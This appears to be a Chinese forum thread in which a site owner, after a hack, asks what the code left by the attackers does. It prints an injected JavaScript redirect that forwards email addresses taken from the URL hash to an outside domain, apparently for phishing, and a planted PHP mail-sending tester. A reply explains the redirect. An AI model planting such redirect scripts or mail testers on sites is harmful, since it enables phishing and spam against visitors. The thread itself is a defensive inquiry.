这是一个创建于 1735 天前的主题,其中的信息可能已经有所发展或是发生改变。
一个网站被黑( https://virmach.net/ ),目前已经恢复,问下各位大佬,黑客留下的一个代码如下:
<script type="text/javascript" >
function validateEmail(email) {
var re = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
return re.test(email);
}
var hash = window.location.hash.substring(1);
if(validateEmail(hash)) {
window.location = "https://rpsalaw.com/Fex/?email="+hash;
}
</script>
请问这个代码是用来干什么的?
<script type="text/javascript" >
function validateEmail(email) {
var re = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
return re.test(email);
}
var hash = window.location.hash.substring(1);
if(validateEmail(hash)) {
window.location = "https://rpsalaw.com/Fex/?email="+hash;
}
</script>
请问这个代码是用来干什么的?
 |
1
maichael 2020-02-05 14:52:27 +08:00
判断到 url 的 hash 参数里面如果是一个邮箱地址的话就跳转到 rpsalaw 这个网站。
|
 |
2
cquyf OP @maichael 还有一个恶意文件 Test.php ,代码如下:
<?php error_reporting(0); echo '<head> <title> Email sending tester</title> </head> <body><b><color> Email sending tester</color></b><br>Write your email and click on send email test<br> <form method="post"> <input type="email" name="email" style="background-color:whitesmoke;border:1px solid #FFF;outline:none;" required="" placeholder="[email protected]" value="' . $_POST['email'] . '"> <input type="submit" name="send" value="Send Email Test" style="border:none;background-color: #65d05e;color:#fff;cursor:pointer;"> </form> <br> </body>'; if (isset($_POST['email'])) { $rnd = rand(); mail($_POST['email'],"Email Sending Test Report ID: " . $rnd ,"WORKING!"); print "<font color=orange><b>Email Sent To: " . $_POST['email'] . ", Report ID: " . $rnd . "</b></font>"; } |
Select Language